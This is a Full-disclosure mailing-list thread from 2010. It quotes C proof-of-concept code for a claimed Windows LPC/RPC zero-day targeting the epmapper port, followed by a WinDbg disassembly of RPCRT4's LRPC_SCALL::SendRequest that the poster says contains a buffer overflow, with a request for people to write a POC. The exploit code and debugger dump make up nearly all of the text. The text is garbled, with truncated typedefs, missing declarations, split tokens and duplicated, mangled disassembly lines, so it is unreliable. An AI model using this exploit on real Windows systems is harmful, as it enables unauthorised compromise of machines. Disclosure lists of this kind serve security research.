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Re: [Full-disclosure] LPC 0day

Hi yuange

Is it a flaw at Windows itself or a third party product?


2010/10/7 yuange <yuange1975@xxxxxxxxxxx>

> #include <windows.h>
> #include <stdio.h>
> //#include "ntdll.h"
> //#pragma  comment(lib,"ntdll.lib")
> #pragma  comment(lib,"advapi32.lib")
> typedef enum _PROCESSINFOCLASS {
> ProcessDebugPort=7// 7 Y Y
> typedef struct _UNICODE_STRING {
>   USHORT Length;
>   USHORT MaximumLength;
>   PWSTR Buffer;
> typedef struct _CLIENT_ID
> {
>     HANDLE UniqueProcess;
>     HANDLE UniqueThread;
> #define PORT_NAME_LEN               64
> #define LRPC_CONNECT_REQUEST     0
> #define    offset    0x100+0x4-0x6*4
> #define    MAXLEN    0x148
> #define    BACKNAME  L"\\RPC Control\\back2"
> #define    RPCLPCNAME L"\\RPC Control\\epmapper"
> #define    BINDNAME  L"back2"
> typedef struct _LRPC_BIND_EXCHANGE
> {
>     INT                ConnectType ;
>     DWORD         AssocKey ;
>     char              szPortName[PORT_NAME_LEN] ;
>     RPC_SYNTAX_IDENTIFIER TransferSyntax;
>     RPC_STATUS RpcStatus;
>     unsigned char fBindBack ;
>     unsigned char fNewSecurityContext ;
>     unsigned char fNewPresentationContext;
>     unsigned char PresentationContext;
>     unsigned char Pad[3];
>     unsigned long SecurityContextId;
> typedef struct _LPC_MESSAGE
> {
>   USHORT                  DataSize;
>   USHORT                  MessageSize;
>   USHORT                  MessageType;
>   USHORT                  DataInfoOffset;
>   CLIENT_ID               ClientId;
>   ULONG                   MessageId;
>   ULONG                   SectionSize;
> //  UCHAR    & nbsp;                 Data[];
> typedef struct _OBJECT_ATTRIBUTES
> {
>     DWORD           Length;
>     HANDLE          RootDirectory;
>     PUNICODE_STRING ObjectName;
>     DWORD           Attributes;
>     PVOID           SecurityDescriptor;
>     PVOID           SecurityQualityOfService;
> typedef
>   OUT PHANDLE             PortHandle,
>   IN POBJECT_ATTRIBUTES   ObjectAttributes,
>   IN ULONG                MaxConnectInfoLength,
>   IN ULONG                MaxDataLength,
>   IN OUT PULONG           Reserved OPTIONAL );
> typedef
>   IN HANDLE               PortHandle,
>   OUT PHANDLE             ReceivePortHandle OPTIONAL,
>   OUT PLPC_MESSAGE        IncomingRequest );
> typedef
>     OUT PHANDLE PortHandle,
>     IN PVOID PortContext OPTIONAL,
>     IN PLPC_MESSAGE ConnectionRequest,
>     IN BOOLEAN AcceptConnection,
>     IN OUT int int1, //    IN OUT PPORT_VIEW ServerView OPTIONAL,
>     OUT int int2  //OUT PREMOTE_PORT_VIEW ClientView OPTIONAL
>     );
> typedef
>     OUT PHANDLE PortHandle,
>     IN OUT int int1,
>     IN OUT int int2,
>     OUT PULONG MaxMessageLength OPTIONAL,
>     IN OUT PVOID ConnectionInformation OPTIONAL,
>     IN OUT PULONG ConnectionInformationLength OPTIONAL
>   );
> typedef
>   IN  HANDLE               PortHandle,
>   IN  PLPC_MESSAGE         Request,
>   OUT PLPC_MESSAGE        IncomingReply );
> typedef
>     IN HANDLE PortHandle
>     );
> typedef
>     PUNICODE_STRING DestinationString,
>     PCWSTR SourceString
>     );
> typedef
>   IN HANDLE               PortHandle,
>   IN PLPC_MESSAGE         Reply );
> typedef
>   IN HANDLE               ProcessHandle,
>   IN PROCESSINFOCLASS ProcessInformationClass,
>   IN PVOID                ProcessInformation,
>   IN ULONG                ProcessInformationLength );
> typedef struct _DEBUG_MESSAGE
> {
>     LPC_MESSAGE        PORT_MSG;
>     DEBUG_EVENT        DebugEvent;
> NTCREATEPORT               NtCreatePort;
> NTREPLYPORT                NtReplyPort;
> NTCONNECTPORT              NtConnectPort;
> RTLINITUNICODESTRING       RtlInitUnicodeString;
> NTACCEPTCONNECTPORT        NtAcceptConnectPort;
> NTCOMPLETECONNECTPORT      NtCompleteConnectPort;
> template <int i> struct PORT_MESSAGEX : LPC_MESSAGE {
> UCHAR Data[i];
> };
> int   server();
> void  initapi();
> int main()
> {
> // LPC_MESSAGE         Reply;
> //    HMODULE hNtdll;
> //    DWORD    dwAddrList[9];
>     BOOL    bExit = FALSE;
> //    DWORD    dwRet;
> //    HANDLE    hPort;
>     int        k=0;
>  unsigned   long i;
> //    DEBUG_MESSAGE dm;
>     OBJECT_ATTRIBUTES oa = {sizeof(oa)};
>     PORT_MESSAGEX<0x130> PortReply,PortRecv;
>     STARTUPINFO    si={sizeof(si)};
>    // NTSTATUS
>  int  Status;
>  PLPC_MESSAGE        Request;
> // PLPC_MESSAGE        IncomingReply;
>  LPC_MESSAGE         Message;
>  HANDLE LsaCommandPortHandle;
>     UNICODE_STRING LsaCommandPortName;
>  DWORD Key=0x11223344;
>     unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
>  BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
>     BindExchange.AssocKey = Key;
> //    wcscpy((wchar_t *)&(BindExchange.szPortName),BINDNAME);
>  DynamicQos.ImpersonationLevel =SecurityAnonymous; //
> SecurityImpersonation;
>     DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING;
>     DynamicQos.EffectiveOnly = TRUE;
>     initapi();
>     printf( "\r\nwindows lpc test!\r\n");
>  CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)server,0,0,&i);
>  //
>     // Connect to the Reference Monitor Command Port.  This port
>     // is used to send commands from the LSA to the Reference Monitor.
>     //
>     RtlInitUnicodeString( &LsaCommandPortName,RPCLPCNAME);
>     Status = NtConnectPort(
>                  &LsaCommandPortHandle,
>                  &LsaCommandPortName,
>                  &DynamicQos,
>                  NULL,
>                  NULL,
>                  NULL,    // &maxlen,
>                  &BindExchange,
>                  &Bi ndExchangeLength);
>     if ((Status)) {
>     exit(Status);
>          //print(("LsapRmInitializeServer - Connect to Rm Command Port
> failed 0x%lx\n",Status));
>         // goto InitServerError;
>     }
> //    exit(0);
> /*
>     //create port
>     dwRet = NtCreatePort(&hPort, &oa, 0, 0x148, 0);
>     if(dwRet != 0)
>     {
>         printf("create hPort failed. ret=%.8X\n", dwRet);
>         return 0;
>     }
>     //create process
>     if(!CreateProcess(0, "debugme.exe", NULL, NULL, TRUE,
>         CREATE_SUSPENDED, 0, 0, &si, &pi))
>     {
>         printf("CreateProcess failed:%d\n", GetLastError());
>         return 0;
>     }
>     //set debug port
>     dwRet = NtSetInformationProcess(pi.hProcess, ProcessDebugPort,
>         &hPort, sizeof(hPo rt));
>     if(dwRet != 0)
>     {
>         printf("set debug port error:%.8X\n", dwRet);
>         return 0;
>     }
>     //printf("pid:0x%.8X %d hPort=0x%.8X\n", pi.dwProcessId,
> pi.dwProcessId, hPort);
>     ResumeThread(pi.hThread);
> */
>     while (true)
>     {
>         memset(&Message, 0, sizeof(Message));
>   Message.MessageSize=0x118;
>   Message.DataSize=0x100;
>   Message.MessageId=0x1122;
>   Request=&Message;
>     memset(&PortReply, 0, sizeof(PortReply));
>         //    memcpy(&PortReply, &dm, sizeof(dm));
>       memset(&PortReply, 0, sizeof(PortReply));
>         //    memcpy(&PortReply, &dm, sizeof(dm));
>             PortReply.MessageSize = 0x100;
>             PortReply.DataSize = 0x100-0x18;
>    PortReply.MessageType=0;
>             PortReply.MessageId=0x1122;
>             PortReply.Data[0]=0x0b;
>             PortReply.Data[1]=0;
>    PortReply.Data[2]=0;
>    PortReply.Data[3]=0;
>    PortReply.Data[4]=0;
>             wcscpy((wchar_t *)&(PortReply.Data[0x10]),BINDNAME);
>      Sleep(1000);
> Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
> //Reply);
>           //  memcpy(&PortReply.Data[offset-4], &dwAddrList,
> sizeof(dwAddrList));
>     PortReply.MessageSize = 0xa0;
>             PortReply.DataSize = 0xa0-0x18;
>    PortReply.MessageType=0;
>             PortReply.MessageId=0x1122;
>             PortReply.Data[0]=0x0;
>             PortReply.Data[1]=0;
>    PortReply.Data[2]=0;
>    PortReply.Data[3]=0;
>    PortReply.Data[4]=0;
>             memcpy((unsigned char *)&(PortReply.Data[0x0c]),
> "\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00",0x20);
> //"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00",0x20);
>           //  memcpy(&PortReply.Data[offset-4], &dwAddrList,
> sizeof(dwAddrList));
>    _asm{
>   // die: jmp die
>    }
>    Sleep(1000);
> Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
> //Reply);
>  BindExchange=*(LRPC_BIND_EXCHANGE *)&(PortRecv.Data[8]);
>             if (!(Status))
>    {
>     while(1){
>        PortReply.MessageSize = 0x100;
>                 PortReply.DataSize = 0x100-0x18;
>        PortReply.MessageType=0;
>                 PortReply.MessageId=PortRecv.MessageId;
>                 PortReply.Data[0]=0x01;
>                 PortReply.Data[1]=0;
>        PortReply.Data[2]=0;
>        PortReply.Data[3]=0;
>        PortReply.Data[4]=0x3;
>     PortReply.Data[5]=0;
>     PortReply.Data[6]=0;
>                 *(int *)(&(PortReply.Data[0x18]))=*(int
> *)(&(PortRecv.Data[0x30]));
>    _asm{
> // die: jmp die
>    }
>                Sleep(100);
> Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
> //Reply);
>           Sleep(0x7fffffff);
>     }
>    }
>  }
>     return 0;
> }
> int server()
> {
>    BOOL    bExit = FALSE;
>     DWORD    dwRet;
> //    HANDLE    hPort;
>     int        k=0;
>  unsigned   long maxlen;
>   //  DEBUG_MESSAGE dm;
>     OBJECT_ATTRIBUTES oa = {sizeof(oa)};
>     PORT_MESSAGEX<0x130> PortReply,PortRecv;
>     STARTUPINFO    si={sizeof(si)};
>    // NTSTATUS
>  int  Status;
>  PLPC_MESSAGE        Request;
>  PLPC_MESSAGE        IncomingReply;
>  LPC_MESSAGE         Message;
>  HANDLE BackPortHandle,NewHandle,NewAccHandle;
>     UNICODE_STRING BackPortName;
>  DWORD Key=0x11223344;
>     unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
>  BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
>     BindExchange.AssocKey = Key;
>  DynamicQos.ImpersonationLevel =SecurityAnonymous; //
> SecurityImpersonation;
>     DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING;
>     DynamicQos.EffectiveOnly = TRUE;
>     RtlInitUnicodeString( &BackPortName,BACKNAME);
>  memset(&oa,0,sizeof(oa));
>     oa.Length=0x18;
>  oa.ObjectName=&BackPortName;
>  oa.Attributes=0x40;
>     //InitializeObjectAttributes(&oa,&BackPortName,0x40,0,0);
>   //OBJ_CASE_INSENSITIVE,0,0); //SecurityDescriptor);
>     //create port
>     dwRet = NtCreatePort(&BackPortHandle, &oa,
>     if(dwRet != 0)
>     {
>         printf("create hPort failed. ret=%.8X\n", dwRet);
>        // return 0;
>     }
>     while (true)
>     {
>         memset(&Message, 0, sizeof(Message));
>   Message.MessageSize=0x118;
>   Message.DataSize=0x100;
>   Message.MessageId=0x11;
>   Request=&Message;
>       memset(&PortReply, 0, sizeof(PortReply));
>         //    memcpy(&PortReply, &dm, sizeof(dm));
>             PortReply.MessageSize = 0x148;
>             PortReply.DataSize = 0x130;
>    PortReply.MessageType=0;
>             PortReply.Data[0]=0x0b;
>             PortReply.Data[1]=0;
>    PortReply.Data[2]=0;
>    PortReply.Data[3]=0;
>    PortReply.Data[4]=0;
>           //  memcpy(&PortReply.Data[offset-4], &dwAddrList,
> sizeof(dwAddrList));
>         Status=NtReplyWaitReceivePort(BackPortHandle,0,0,&PortRecv);
> //Reply);
>         if(PortRecv.MessageType==LPC_CONNECTION_REQUEST)
>   {
>   Status=NtAcceptConnectPort(&NewAccHandle, 0, &PortRecv,1, NULL, NULL);
>   Status=NtCompleteConnectPort (NewAccHandle);
>       memset(&PortRecv, 0, sizeof(PortRecv));
>    Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv);
> //&PortReply,&PortRecv);
>    while(1)
>    {
>    PortRecv.MessageSize = 0x148;
>             PortRecv.DataSize = 0x130;
>   // PortReply.MessageId=PortRecv.MessageId;
>             _asm{
> //die: jmp die
>    }
>    Status=NtReplyWaitReceivePort(NewAccHandle,0,&PortRecv,&PortRecv);
> //&PortReply,&PortRecv);
>    Sleep(100);
>    Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv);
> //&PortReply,&PortRecv);
>    }
>   }
>  }
> }
> void initapi()
> {
>   HMODULE hNtdll;
>     //get native api address
>     hNtdll = LoadLibrary("ntdll.dll");
>     if(hNtdll == NULL)
>     {
>         printf("LoadLibrary failed:%d\n", GetLastError());
>     }
>     NtReplyWaitReceivePort = (NTREPLYWAITRECVIVEPORT)
>          GetProcAddress(hNtdll, "NtReplyWaitReceivePort");
>     NtCreatePort = (NTCREATEPORT)
>          GetProcAddress(hNtdll, "NtCreatePort");
>     NtReplyPort = (NTREPLYPORT)
>          GetProcAddress(hNtdll, "NtReplyPort");
>     NtSetInformationProcess = (NTSETINFORMATIONPROCESS)
>          GetProcAddress(hNtdll, "NtSetInformationProcess");
>    GetProcAddress(hNtdll,"NtRequestWaitReplyPort");
>  NtConnectPort  =             (NTCONNECTPORT)
>       GetProcAddress(hNtdll, "NtConnectPort");
>  NtCompleteConnectPort  =     (NTCOMPLETECONNECTPORT)
>       GetProcAddress(hNtdll, "NtCompleteConnectPort");
>  NtAcceptConnectPort  =     (NTACCEPTCONNECTPORT)
>       GetProcAddress(hNtdll, "NtAcceptConnectPort");
>     RtlInitUnicodeString=(RTLINITUNICODESTRING)
>          GetProcAddress(hNtdll,"RtlInitUnicodeString");
> }
> ------------------------------
> From: yuange1975@xxxxxxxxxxx
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: 0day analysis of the challenges
> Date: Tue, 7 Sep 2010 12:38:27 +0000
> 0day analysis of the challenges
> 2010-08-05 20:32 2010-08-05 20:32
> The following code has a buffer overflow, please write POC code analysis.
> Code please send to yuange1975@xxxxxxx .
> **
> 0:014> u RPCRT4!LRPC_SCALL::SendRequest 0:014> u RPCRT4! LRPC_SCALL::
> SendRequest
> RPCRT4!LRPC_SCALL::SendRequest: RPCRT4! LRPC_SCALL:: SendRequest:
> 77c4d4e6 8bff            mov     edi,edi 77c4d4e6 8bff mov edi, edi
> 77c4d4e8 55              push    ebp 77c4d4e8 55 push ebp
> 77c4d4e9 8bec            mov     ebp,esp 77c4d4e9 8bec mov ebp, esp
> 77c4d4eb 81ec10010000    sub     esp,110h 77c4d4eb 81ec10010000 sub esp,
> 110h
> 77c4d4f1 a16c86cb77      mov     eax,dword ptr [RPCRT4!__security_cookie
> (77cb86 77c4d4f1 a16c86cb77 mov eax, dword ptr [RPCRT4! __security_cookie
> (77cb86
> 6c)] 6c)]
> 77c4d4f6 53              push    ebx 77c4d4f6 53 push ebx
> 77c4d4f7 56              push    esi 77c4d4f7 56 push esi
> 77c4d4f8 8945fc          mov     dword ptr [ebp-4],eax 77c4d4f8 8945fc mov
> dword ptr [ebp-4], eax
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x15: RPCRT4! LRPC_SCALL:: SendRequest +0
> x15:
> 77c4d4fb 8b450c          mov     eax,dword ptr [ebp+0Ch] 77c4d4fb 8b450c
> mov eax, dword ptr [ebp +0 Ch]
> 77c4d4fe 8bf1            mov     esi,ecx 77c4d4fe 8bf1 mov esi, ecx
> 77c4d500 33c9            xor     ecx,ecx 77c4d500 33c9 xor ecx, ecx
> 77c4d502 57              push    edi 77c4d502 57 push edi
> 77c4d503 8b7d08          mov     edi,dword ptr [ebp+8] 77c4d503 8b7d08 mov
> edi, dword ptr [ebp +8]
> 77c4d506 bb00200000      mov     ebx,2000h 77c4d506 bb00200000 mov ebx,
> 2000h
> 77c4d50b 8908            mov     dword ptr [eax],ecx 77c4d50b 8908 mov
> dword ptr [eax], ecx
> 77c4d50d 855f28          test    dword ptr [edi+28h],ebx 7 7c4d50d 855f28
> test dword ptr [edi +28 h], ebx
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x2a: RPCRT4! LRPC_SCALL:: SendRequest +0
> x2a:
> 77c4d510 8985f0feffff    mov     dword ptr [ebp-110h],eax 77c4d510
> 8985f0feffff mov dword ptr [ebp-110h], eax
> 77c4d516 898df8feffff    mov     dword ptr [ebp-108h],ecx 77c4d516
> 898df8feffff mov dword ptr [ebp-108h], ecx
> 77c4d51c 0f85422f0100    jne     RPCRT4!LR PC_SCALL::SendRequest+0x38
> (77c60464) 77c4d51c 0f85422f0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
> x38 (77c60464)
> 77c4d522 8d86d8000000    lea     eax,[esi+0D8h] 77c4d522 8d86d8000000 lea
> eax, [esi +0 D8h]
> 77c4d528 3908            cmp     dword ptr [eax],ecx 77c4d528 3908 cmp
> dword ptr [eax], ecx
> 77c4d52a 740e            je      RPCRT4!LRPC_SCALL::SendRequest+0xaf
> (77c4d53a) 77c4d52a 740e je RPCRT4! LRPC_SCALL:: SendRequest +0 xaf
> (77c4d53a)
> 77c4d52c 398ef8000000    cmp     dword ptr [esi+0F8h],ecx 77c4d52c
> 398ef8000000 cmp dword ptr [esi +0 F8h], ecx
> 77c4d532 8908            mov     dword ptr [eax],ecx 77c4d532 8908 mov
> dword ptr [eax], ecx
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x75: RPCRT4! LRPC_SCALL:: SendRequest +0
> x75:
> 77c4d534 0f845a2f0100    je      RPCRT4!LRPC_SCALL::SendRequest+0x77
> (77c60494) 77c4d534 0f845a2f0100 je RPCRT 4! LRPC_SCALL:: SendRequest +0
> x77 (77c60494)
> 77c4d53a 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d53a
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d540 f6401c04        test    byte ptr [eax+1Ch],4 77c4d540 f6401c04
> test byte ptr [eax +1 Ch], 4
> 77c4d544 0f84700f0000    je      RPCRT4!LRPC_SCALL::SendRequest+0x1d8
> (77c4e4ba) 77c4d544 0f84700f0000 je RPCRT4! LRPC_SCALL:: SendRequest +0
> x1d8 (77c4e4ba)
> 77c4d54a 668b08          mov     cx,word ptr [eax] 77c4d54a 668b08 mov cx,
> word ptr [eax]
> 77c4d54d 6683c118        add     cx,18h 77c4d54d 6683c118 add cx, 18h
> 77c4d551 66894802        mov     word ptr [eax+2],cx 77c4d551 66894802 mov
> word ptr [eax +2], cx
> 77c4d555 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d555
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0xd0: RPCRT4! LRPC_SCALL:: SendRequest +0
> xd0:
> 77c4d55b f6401d08        test    byte ptr [eax+1Dh],8 77c4d55b f6401d08
> test byte ptr [eax +1 Dh], 8
> 77c4d55f 0f856c2f0100    jne     RPCRT4!LRPC_SCALL::SendRequest+0xd6
> (77c604d1) 77c4d55f 0f856c2f0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
> xd6 (77c604d1)
> 77c4d565 c6401802        mov     byte ptr [eax+18h],2 77c4d565 c6401802
> mov byte ptr [eax +18 h], 2
> 77c4d 569 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d569
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d56f 8b4f0c          mov     ecx,dword ptr [edi+0Ch] 77c4d56f 8b4f0c
> mov ecx, dword ptr [edi +0 Ch]
> 77c4d572 894840          mov     dword ptr [eax+40h],ecx 77c4d572 894840
> mov dword ptr [eax +40 h], ecx
> 77c4d575 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d575
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d57b 8b8eb0000000    mov     ecx,dword ptr [esi+0B0h] 77c4d57b
> 8b8eb0000000 mov ecx, dword ptr [esi +0 B0h]
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0xf8: RPCRT4! LRPC_SCALL:: SendRequest +0
> xf8:
> 77c4d581 894834          mov     dword ptr [eax+34h],ecx 77c4d581 894834
> mov dword ptr [eax +34 h], ecx
> 77c4d584 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d584
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d58a c6401900        mov     byte ptr [eax+19h],0 77c4d58a c6401900
> mov byte ptr [eax +19 h], 0
> 77c4d58e 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d58e
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d594 80480540        or      byte ptr [eax+5],40h 77c4d594 80480540 or
> byte ptr [eax +5], 40h
> 77c4d598 8d85fcfeffff    lea     eax,[ebp-104h] 77c4d598 8d85fcfeffff lea
> eax, [ebp-104h]
> 77c4d59e 50              push    eax 77c4d59e 50 push eax
> 77c4d59f ffb6a4000000    push    dword ptr [esi+0A4h] 77c4d59f
> ffb6a4000000 push dword ptr [esi +0 A4h]
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x11c: RPCRT4! LRPC_SCALL:: SendRequest +0
> x11c:
> 77c4d5a5 8b869c000000    mov     eax,dword ptr [esi+9Ch] 77c4d5a5
> 8b869c000000 mov eax, dword ptr [esi +9 Ch]
> 77c4d5ab ff7024          push    dword ptr [eax+24h] 77c4d5ab ff7024 push
> dword ptr [eax +24 h]
> 77c4d5ae ff15b410c277    call    dword ptr
> [RPCRT4!_imp__NtRequestWaitReplyPort 77c4d5ae ff15b410c277 call dword ptr
> [RPCRT4! _imp__NtRequestWaitReplyPort
> (77c210b4)] (77c210b4)]
> 77c4d5b4 8bc8            mov     ecx,eax 77c4d5b4 8bc8 mov ecx, eax
> 77c4d5b6 b8000000c0 &n bsp;    mov     eax,0C0000000h 77c4d5b6 b8000000c0
> mov eax, 0C0000000h
> 77c4d5bb 23c8            and     ecx,eax 77c4d5bb 23c8 and ecx, eax
> 77c4d5bd 3bc8            cmp     ecx,eax 77c4d5bd 3bc8 cmp ecx, eax
> 77c4d5bf 0f84152f0100    je      RPCRT4!LRPC_SCALL::SendRequest+0x138
> (77c604da) 77c4d5bf 0f84152f0100 je RPCRT4! LRPC_SCALL:: SendRequest +0
> x138 (77c604da)
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x16d: RPCRT4! LRPC_SCALL:: SendRequest +0
> x16d:
> 77c4d5c5 855f28          test    dword ptr [edi+28h],ebx 77c4d5c5 855f28
> test dword ptr [edi +28 h], ebx
> 77c4d5c8 751f            jne     RPCRT4!LRPC_SCALL::SendRequest+0x191
> (77c4d5e9) 77c4d5c8 751f jne RPCRT4! LRPC_SCALL:: SendRequest +0 x191
> (77c4d5e9)
> 77c4d5ca 8b86a4000000    mov     eax,dword ptr [esi+0A4h] 77c4d5ca
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d5d0 8a4018          mov     al,byte ptr [eax+18h] 77c4d5d0 8a4018 mov
> al, byte ptr [eax +18 h]
> 77c4d5d3 3c10            cmp     al,10h 77c4d5d3 3c10 cmp al, 10h
> 77c4d5d5 7412            je      RPCRT4!LRPC_SCALL::SendRequest+0x191
> (77c4d5e9) 77c4d5d5 7412 je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
> (77c4d5e9)
> 77c4d5d7 3c04     &nbs p;      cmp     al,4 77c4d5d7 3c04 cmp al, 4
> 77c4d5d9 740e            je      RPCRT4!LRPC_SCALL::SendRequest+0x191
> (77c4d5e9) 77c4d5d9 740e je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
> (77c4d5e9)
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x183: RPCRT4! LRPC_SCALL:: SendRequest +0
> x183:
> 77c4d5db 8b4708          mov     eax,dword ptr [edi+8] 77c4d5db 8b4708 mov
> eax, dword ptr [edi +8]
> 77c4d5de 85c0            test    eax,eax 77c4d5de 85c0 test eax, eax
> 77c4d5e0 7407            je      RPCRT4!LRPC_SCALL::SendRequest+0x191
> (77c4d5e9) 77c4d5e0 7407 je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
> (77c4d5e9)
> 77c4d5e2 50              push    eax 77c4d5e2 50 push eax
> 77c4d5e3 e80da40000      call    RPCRT4!operator delete (77c579f5) 7
> 7c4d5e3 e80da40000 call RPCRT4! Operator delete (77c579f5)
> 77c4d5e8 59              pop     ecx 77c4d5e8 59 pop ecx
> 77c4d5e9 80bd14ffffff06 cmp     byte ptr [ebp-0ECh],6 77c4d5e9
> 80bd14ffffff06 cmp byte ptr [ebp-0ECh], 6
> 77c4d5f0 0f85f60e0000    jne     RPCRT4!LRPC_SCALL::SendRequest+0x1d0
> (77c4e4ec) 77c4d5f0 0f85f60e0000 jne RPCRT4! LRPC_SCALL:: SendRequest +0
> x1d0 (77c4e4ec)
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x19a: RPCRT4! LRPC_SCALL:: SendRequest +0
> x19a:
> 77c4d5f6 0fbf8516ffffff movsx   eax,word ptr [ebp-0EAh] 77c4d5f6
> 0fbf8516ffffff movsx eax, word ptr [ebp-0EAh]
> 77c4d5fd 8b8df0feffff    mov     ecx,dword ptr [ebp-110h] 77c4d5fd
> 8b8df0feffff mov ecx, dword ptr [ebp-110h]
> 77c4d603 8901            mov     dword ptr [ecx],eax 77c4d603 8901 mov
> dword ptr [ecx], eax
> 77c4d605 8bb5f8feffff    mov   &nb sp; esi,dword ptr [ebp-108h] 77c4d605
> 8bb5f8feffff mov esi, dword ptr [ebp-108h]
> 77c4d60b 85f6            test    esi,esi 77c4d60b 85f6 test esi, esi
> 77c4d60d 0f85ed2e0100    jne     RPCRT4!LRPC_SCALL::SendRequest+0x1b3
> (77c60500) 77c4d60d 0f85ed2e0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
> x1b3 (77c60500)
> 77c4d613 33c0            xor     eax,eax 77c4d613 33c0 xor eax, eax
> 77c4d615 8b4dfc     &nb sp;    mov     ecx,dword ptr [ebp-4] 77c4d615
> 8b4dfc mov ecx, dword ptr [ebp-4]
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x214: RPCRT4! LRPC_SCALL:: SendRequest +0
> x214:
> 77c4d618 5f              pop     edi 77c4d618 5f pop edi
> 77c4d619 5e              pop     esi 77c4d619 5e pop esi
> 77c4d6 1a 5b              pop     ebx 77c4d61a 5b pop ebx
> 77c4d61b e810110000      call    RPCRT4!__security_check_cookie 
> (77c4e730)77c4d61b e810110000 call RPCRT4! __security_check_cookie (77c4e730)
> 77c4d620 c9              leave 77c4d620 c9 leave
> 77c4d621 c20800          ret     8 77c4d621 c20800 ret 8
> 77c4d624 90      &nb sp;       nop 77c4d624 90 nop
> 77c4d625 90              nop 77c4d625 90 nop
> http://hi.baidu.com/yuange1975/blog/item/022dec5901af02272834f0fc.html
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